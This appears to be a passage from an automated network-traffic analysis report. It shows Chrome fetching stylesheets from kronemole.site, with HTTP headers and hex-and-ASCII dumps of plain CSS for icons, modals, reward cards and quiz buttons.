                                                                          2023-11-21 16:58:40 UTC361INData Raw: 2d 6e 6f 74 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 34 39 22 3b 20 7d 0a 0a 2e 66 61 2d 73 74 6f 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 64 22 3b 20 7d 0a 0a 2e 66 61 2d 73 74 6f 70 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 38 64 22 3b 20 7d 0a 0a 2e 66 61 2d 73 74 6f 70 77 61 74 63 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 66 32 22 3b 20 7d 0a 0a 2e 66 61 2d 73 74 6f 70 77 61 74 63 68 2d 32 30 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 65 30 36 66 22 3b 20 7d 0a 0a 2e 66 61 2d 73 74 6f 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66
                                                                          Data Ascii: -note:before { content: "\f249"; }.fa-stop:before { content: "\f04d"; }.fa-stop-circle:before { content: "\f28d"; }.fa-stopwatch:before { content: "\f2f2"; }.fa-stopwatch-20:before { content: "\e06f"; }.fa-store:before { content: "\f
                                                                          2023-11-21 16:58:40 UTC365INData Raw: 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 64 39 22 3b 20 7d 0a 0a 2e 66 61 2d 74 6f 6f 74 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 63 39 22 3b 20 7d 0a 0a 2e 66 61 2d 74 6f 72 61 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 36 61 30 22 3b 20 7d 0a 0a 2e 66 61 2d 74 6f 72 69 69 2d 67 61 74 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 36 61 31 22 3b 20 7d 0a 0a 2e 66 61 2d 74 72 61 63 74 6f 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 32 32 22 3b 20 7d 0a 0a 2e 66 61 2d 74 72 61 64 65 2d 66 65 64 65 72 61 74 69 6f 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 31 33 22 3b 20 7d 0a 0a 2e
                                                                          Data Ascii: { content: "\f7d9"; }.fa-tooth:before { content: "\f5c9"; }.fa-torah:before { content: "\f6a0"; }.fa-torii-gate:before { content: "\f6a1"; }.fa-tractor:before { content: "\f722"; }.fa-trade-federation:before { content: "\f513"; }.
                                                                          2023-11-21 16:58:40 UTC366INData Raw: 32 33 32 61 0d 0a 63 6b 2d 6d 6f 6e 73 74 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 36 33 62 22 3b 20 7d 0a 0a 2e 66 61 2d 74 72 75 63 6b 2d 6d 6f 76 69 6e 67 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 64 66 22 3b 20 7d 0a 0a 2e 66 61 2d 74 72 75 63 6b 2d 70 69 63 6b 75 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 36 33 63 22 3b 20 7d 0a 0a 2e 66 61 2d 74 73 68 69 72 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 35 33 22 3b 20 7d 0a 0a 2e 66 61 2d 74 74 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 65 34 22 3b 20 7d 0a 0a 2e 66 61 2d 74 75 6d 62 6c 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e
                                                                          Data Ascii: 232ack-monster:before { content: "\f63b"; }.fa-truck-moving:before { content: "\f4df"; }.fa-truck-pickup:before { content: "\f63c"; }.fa-tshirt:before { content: "\f553"; }.fa-tty:before { content: "\f1e4"; }.fa-tumblr:before { con
                                                                          2023-11-21 16:58:40 UTC371INData Raw: 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 36 61 39 22 3b 20 7d 0a 0a 2e 66 61 2d 76 6f 6c 75 6d 65 2d 6f 66 66 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 36 22 3b 20 7d 0a 0a 2e 66 61 2d 76 6f 6c 75 6d 65 2d 75 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 38 22 3b 20 7d 0a 0a 2e 66 61 2d 76 6f 74 65 2d 79 65 61 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 37 32 22 3b 20 7d 0a 0a 2e 66 61 2d 76 72 2d 63 61 72 64 62 6f 61 72 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 32 39 22 3b 20 7d 0a 0a 2e 66 61 2d 76 75 65 6a 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34
                                                                          Data Ascii: e:before { content: "\f6a9"; }.fa-volume-off:before { content: "\f026"; }.fa-volume-up:before { content: "\f028"; }.fa-vote-yea:before { content: "\f772"; }.fa-vr-cardboard:before { content: "\f729"; }.fa-vuejs:before { content: "\f4
                                                                          2023-11-21 16:58:40 UTC375INData Raw: 3a 20 34 30 30 3b 20 7d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 46 72 65 65 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 22 2e 2e 2f 77 65 62 66 6f 6e 74 73 2f 66 61 2d 73 6f 6c 69 64 2d 39 30 30 2e 65 6f 74 22 29 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 22 2e 2e 2f 77 65 62 66 6f 6e 74 73 2f 66 61 2d 73 6f 6c 69 64 2d 39 30 30 2e 65 6f 74 3f 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 22 29 2c 20 75 72 6c 28 22 2e 2e
                                                                          Data Ascii: : 400; }@font-face { font-family: 'Font Awesome 5 Free'; font-style: normal; font-weight: 900; font-display: block; src: url("../webfonts/fa-solid-900.eot"); src: url("../webfonts/fa-solid-900.eot?#iefix") format("embedded-opentype"), url("..
                                                                          2023-11-21 16:58:40 UTC375INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.449752104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:40 UTC77OUTGET /assets/css/isp/common.css?v=3cc6aa721bc3b8a31b45d9388214360e HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: text/css,*/*;q=0.1
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: style
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:40 UTC320INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:40 GMT
                                                                          Content-Type: text/css
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:40 GMT
                                                                          last-modified: Wed, 11 Oct 2023 17:01:26 GMT
                                                                          vary: Accept-Encoding,User-Agent,User-Agent
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          CF-Cache-Status: MISS
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8RgkHnCcgn0DT%2BIGKu4tSts6V6PAclTLt4LzNqMLlSzkFEolM2xDykpdMmbq9kARL6sJ3jGo%2FXJv5mV2F0A%2FwQ7OgG07xIIcGuHDaN6TG3L%2BaKMF82BQQaeCbHtiO4T5Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7a9219bc81cd-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:40 UTC321INData Raw: 37 63 37 37 0d 0a 0a 0a 2f 2a 20 43 68 72 6f 6d 65 2c 20 53 61 66 61 72 69 2c 20 45 64 67 65 2c 20 4f 70 65 72 61 20 2a 2f 0a 69 6e 70 75 74 3a 3a 2d 77 65 62 6b 69 74 2d 6f 75 74 65 72 2d 73 70 69 6e 2d 62 75 74 74 6f 6e 2c 0a 69 6e 70 75 74 3a 3a 2d 77 65 62 6b 69 74 2d 69 6e 6e 65 72 2d 73 70 69 6e 2d 62 75 74 74 6f 6e 20 7b 0a 09 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 6e 6f 6e 65 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 7d 0a 2e 66 6f 6c 6c 6f 77 5f 73 74 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 38 30 30 3b 0a 7d 0a 3a 72 6f 6f 74 20 7b 0a 20 20 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 20 70 61 6e 2d 78 20 70 61 6e 2d 79 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30
                                                                          Data Ascii: 7c77/* Chrome, Safari, Edge, Opera */input::-webkit-outer-spin-button,input::-webkit-inner-spin-button {-webkit-appearance: none;margin: 0;}.follow_st{font-size: 20px; font-weight: 800;}:root { touch-action: pan-x pan-y; height: 10
                                                                          2023-11-21 16:58:40 UTC322INData Raw: 6d 6f 64 61 6c 2d 64 69 61 6c 6f 67 2c 20 23 6d 6f 64 61 6c 5f 65 6d 61 69 6c 5f 70 6f 70 75 70 20 2e 6d 6f 64 61 6c 2d 64 69 61 6c 6f 67 7b 0a 09 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 3b 0a 7d 0a 23 6d 6f 64 61 6c 5f 65 6d 61 69 6c 20 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 2c 20 23 6d 6f 64 61 6c 5f 65 6d 61 69 6c 5f 70 6f 70 75 70 20 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 7b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 35 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 30 70 78 3b 0a 7d 0a 23 6d 6f 64 61 6c 5f 65 6d 61 69 6c 20 2e 69 6e 70 75 74 5f 61 6c 6f 6e 65 2c 20 23 6d 6f 64 61 6c 5f 65 6d 61 69 6c 5f 70 6f 70 75 70 20 2e 69 6e 70 75 74 5f 61 6c 6f 6e 65 7b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 7d 0a 23 6d
                                                                          Data Ascii: modal-dialog, #modal_email_popup .modal-dialog{max-width: 800px;}#modal_email .modal-content, #modal_email_popup .modal-content{border-radius: 15px;margin-top: 200px;}#modal_email .input_alone, #modal_email_popup .input_alone{width: 100%;}#m
                                                                          2023-11-21 16:58:40 UTC323INData Raw: 6b 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 30 25 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 41 42 42 39 43 37 3b 0a 09 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 0a 09 74 6f 70 3a 20 2d 31 35 70 78 3b 0a 20 20 20 20 72 69 67 68 74 3a 20 2d 31 35 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 35 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 7d 0a 2e 73 74 61 79 6c 2c 20 2e 74 68 6b 73 2c 20 2e 6f 6e 65 5f 6d 6d 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 38 30 30 3b 0a 7d 0a 2e 73 74 61 79 6c 20 73 76 67 7b 0a 09 68 65 69 67 68 74 3a 20 34 30 70 78 3b 0a 20
                                                                          Data Ascii: k;border-radius: 100%;background-color: #ABB9C7;color: #ffffff;font-size: 30px;top: -15px; right: -15px; padding: 0 15px; font-weight: 700;}.stayl, .thks, .one_mm{font-size: 40px;font-weight: 800;}.stayl svg{height: 40px;
                                                                          2023-11-21 16:58:40 UTC324INData Raw: 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 32 66 32 66 32 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 7d 0a 0a 2f 2a 68 65 61 64 65 72 2a 2f 0a 2e 63 72 5f 6c 65 67 5f 6c 2c 20 2e 63 72 5f 6c 65 67 5f 72 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 6f 70 3a 20 30 3b 0a 09 77 69 64 74 68 3a 20 34 30 25 3b 0a 7d 0a 0a 2e 63 72 5f 6c 65 67 5f 6c 20 69 6d 67 2c 20 2e 63 72 5f 6c 65 67 5f 72 20 69 6d 67 20 7b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 7d 0a 0a 2e 63 72 5f 6c 65 67 5f 6c 20 7b 0a 09 6c 65 66 74 3a 20 30 3b 0a 7d 0a 0a 2e 63 72 5f 6c 65 67 5f 72 20 7b 0a 09 72 69 67 68 74 3a 20 30 3b 0a 7d 0a 0a 2e 63 72 5f 6c 65 67 5f 6d 6f
                                                                          Data Ascii: y: sans-serif !important;background-color: #f2f2f2;}body {}/*header*/.cr_leg_l, .cr_leg_r {position: absolute;top: 0;width: 40%;}.cr_leg_l img, .cr_leg_r img {width: 100%;}.cr_leg_l {left: 0;}.cr_leg_r {right: 0;}.cr_leg_mo
                                                                          2023-11-21 16:58:40 UTC326INData Raw: 62 73 6f 6c 75 74 65 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 6e 74 61 69 6e 3b 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 7d 0a 0a 2e 6a 75 6c 79 5f 6d 62 5f 6c 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 25 3b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 35 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 31 35 70 78 3b 0a 7d 0a 0a 2e 6a 75 6c 79 5f 6d 62 5f 72 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 78 3a 20 39 37 25 3b 0a 09 62 6f 74 74 6f 6d 3a 20 30 3b 0a 7d 0a 0a 2e 73 69 74 65 2d 6c 6f 67 6f 20 7b 0a 09 6d 61 78 2d 77 69 64 74 68 3a 20 69 6e 68 65
                                                                          Data Ascii: bsolute;background-repeat: no-repeat;background-size: contain;display: none;}.july_mb_l {background-position: 0%;margin-left: -15px;margin-top: -15px;}.july_mb_r {background-position-x: 97%;bottom: 0;}.site-logo {max-width: inhe
                                                                          2023-11-21 16:58:40 UTC327INData Raw: 65 69 67 68 74 3a 20 31 2e 32 3b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 33 70 78 20 37 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 33 29 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 31 30 30 70 78 3b 0a 7d 0a 0a 2e 72 65 77 61 72 64 2d 62 69 67 2d 63 69 72 63 6c 65 20 7b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 30 70 78 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 2e 38 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 32 35 70 78 20 33 30 70 78 20 32 35 70 78 3b 0a 09 61 6e 69 6d 61 74 69 6f 6e 3a 20
                                                                          Data Ascii: eight: 1.2;box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3);width: 100px;height: 100px;}.reward-big-circle {border-radius: 100px;position: absolute;text-align: center;line-height: 0.8;font-size: 20px;padding: 30px 25px 30px 25px;animation:
                                                                          2023-11-21 16:58:40 UTC328INData Raw: 20 2a 2f 0a 7d 0a 0a 2e 63 68 6f 69 63 65 73 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 6e 73 77 65 72 4f 70 74 69 6f 6e 3a 6e 6f 74 28 2e 62 74 6e 2d 70 72 69 6d 61 72 79 29 20 7b 0a 09 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 70 72 69 6d 61 72 79 2d 63 6f 6c 6f 72 29 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 30 3b 0a 7d 0a 0a 2e 63 68 6f 69 63 65 73 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 6e 73 77 65 72 4f 70 74 69 6f 6e 3a 6e 6f 74 28 2e 62 74 6e 2d 70 72 69 6d 61 72 79 29 3a 68 6f 76 65 72 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 63 6f 6c 6f 72 29 3b 0a 7d 0a 0a 2e 75 6c 2d 70 72 6f 67 72 65 73 73 20 7b 0a
                                                                          Data Ascii: */}.choices-container .answerOption:not(.btn-primary) {color: var(--primary-color);background-color: #f0f0f0;}.choices-container .answerOption:not(.btn-primary):hover {color: #fff;background-color: var(--secondary-color);}.ul-progress {
                                                                          2023-11-21 16:58:40 UTC330INData Raw: 4f 70 74 69 6f 6e 2c 20 2e 63 6f 6e 74 69 6e 75 65 5f 73 20 7b 0a 09 77 69 64 74 68 3a 20 37 30 25 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 09 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 32 32 70 78 3b 0a 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 7d 0a 0a 2e 61 6e 73 77 65 72 4f 70 74 69 6f 6e 3a 66 6f 63 75 73 2c 20 2e 63 6f 6e 74 69 6e 75 65 5f 73 3a 66 6f 63 75 73 20 7b 0a 09 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b
                                                                          Data Ascii: Option, .continue_s {width: 70%;padding: 10px;display: table;margin: auto;font-size: 18px;font-weight: 700;text-align: center;border-radius: 22px;cursor: pointer;border: none;}.answerOption:focus, .continue_s:focus {outline: none;
                                                                          2023-11-21 16:58:40 UTC331INData Raw: 6c 65 66 74 3a 20 37 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 37 70 78 3b 0a 7d 0a 0a 2e 63 6f 6d 6d 65 6e 74 20 2e 61 63 74 69 6f 6e 73 20 2e 61 63 74 2d 6c 69 6b 65 2c 0a 2e 63 6f 6d 6d 65 6e 74 20 2e 61 63 74 69 6f 6e 73 20 2e 61 63 74 2d 63 6f 6d 6d 65 6e 74 20 7b 0a 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 7d 0a 0a 2e 76 69 63 6f 6e 20 7b 0a 09 77 69 64 74 68 3a 20 31 36 70 78 3b 0a 09 6d 61 72 67 69 6e 3a 20 37 70 78 3b 0a 7d 0a 0a 2e 76 74 65 78 74 20 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 0a 09 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 0a 09 63 6f 6c 6f 72 3a 20 23 33 38 42 44 33 36 3b 0a 7d 0a 0a 2e 72 61 74 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 6d 61 72 67 69 6e 2d 62
                                                                          Data Ascii: left: 7px;padding-right: 7px;}.comment .actions .act-like,.comment .actions .act-comment {cursor: pointer;}.vicon {width: 16px;margin: 7px;}.vtext {font-size: 10px;font-style: italic;color: #38BD36;}.rating-container {margin-b
                                                                          2023-11-21 16:58:40 UTC332INData Raw: 20 31 33 70 78 3b 0a 7d 0a 0a 23 70 6f 6c 69 63 79 2d 63 6f 6e 74 65 6e 74 20 7b 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 61 75 74 6f 3b 0a 09 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 39 30 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 7d 0a 0a 23 70 6f 6c 69 63 79 2d 62 74 6e 2c 0a 23 74 65 72 6d 73 2d 62 74 6e 20 7b 0a 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 0a 2f 2a 20 50 6f 70 20 55 70 20 63 6f 64 65 20 50 6f 6c 69 63 79 20 2a 2f 0a 0a 23 70 6f 6c 69 63 79 2d 63 6c 6f 73 65 20 7b 0a 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 30 3b 0a 09 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 09 68 65 69 67 68
                                                                          Data Ascii: 13px;}#policy-content {overflow: auto;padding: 20px;height: 900px;margin-top: 30px;}#policy-btn,#terms-btn {cursor: pointer;text-decoration: underline;}/* Pop Up code Policy */#policy-close {margin-right: 0;width: 30px;heigh
                                                                          2023-11-21 16:58:40 UTC334INData Raw: 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 33 46 46 46 33 0a 7d 0a 2e 72 65 77 61 72 64 2d 70 61 67 65 7b 0a 09 70 61 64 64 69 6e 67 3a 20 32 72 65 6d 20 30 3b 0a 7d 0a 2e 72 65 77 61 72 64 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 77 69 64 74 68 3a 20 39 35 25 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 3a 20 61 75 74 6f 3b 0a 7d 0a 2e 72 65 77 61 72 64 20 2e 64 65 73 63 72 69 70 74 69 6f 6e 7b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 7d 0a 2e 72 65 77 61 72 64 20 2e 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 61 7b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a 2e 72 65 77 61 72 64 2e 72 6f 77 3a 6e 74 68 2d 63 68 69 6c 64 28 31 29 20 7b 0a 09 2f 2a 20 62 6f 72 64 65
                                                                          Data Ascii: background: #F3FFF3}.reward-page{padding: 2rem 0;}.reward {background-color: #fff;width: 95%; margin-inline: auto;}.reward .description{margin-top: 0;}.reward .content-wrapper a{display: block;}.reward.row:nth-child(1) {/* borde
                                                                          2023-11-21 16:58:40 UTC335INData Raw: 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 67 61 70 3a 20 30 2e 35 72 65 6d 3b 0a 7d 0a 2e 72 65 77 61 72 64 2d 70 61 67 65 20 2e 72 65 77 61 72 64 2e 72 6f 77 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 2e 74 6f 70 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 7d 0a 2e 72 65 77 61 72 64 2d 70 61 67 65 20 2e 72 65 77 61 72 64 2e 72 6f 77 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 20 2e 70 6f 70 75 6c 61 72 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 7d 0a 0a 0a 2f 2a 20 2e 72 65 77 61 72 64 2d 70 61 67 65 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 2e 72 65 77 61 72 64 20 7b 0a 09 62 6f 72 64 65 72 3a 20 34 70 78 20 73 6f 6c 69 64 20 23 33 63 63 61 65 32
                                                                          Data Ascii: ntent: center; gap: 0.5rem;}.reward-page .reward.row:first-child .top { display: inline-block;}.reward-page .reward.row:nth-child(2) .popular { display: inline-block;}/* .reward-page div:nth-child(2).reward {border: 4px solid #3ccae2
                                                                          2023-11-21 16:58:40 UTC336INData Raw: 68 3a 20 36 30 70 78 3b 0a 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 74 6f 70 3a 20 2d 32 30 70 78 3b 0a 09 6c 65 66 74 3a 20 35 30 25 3b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 33 30 70 78 3b 0a 7d 0a 0a 2e 65 6c 65 6d 5f 6c 6f 61 64 20 73 70 61 6e 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 34 63 61 36 39 3b 0a 09 68 65 69 67 68 74 3a 20 32 30 70 78 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 32 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 5f 6c 6f 61 64 20 73 70 61 6e 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 76 65 72
                                                                          Data Ascii: h: 60px;box-sizing: border-box;top: -20px;left: 50%;margin-left: -30px;}.elem_load span {background: #34ca69;height: 20px;width: 100%;display: block;margin: 0 auto;border-radius: 2px;}.row_load span {display: inline-block;ver
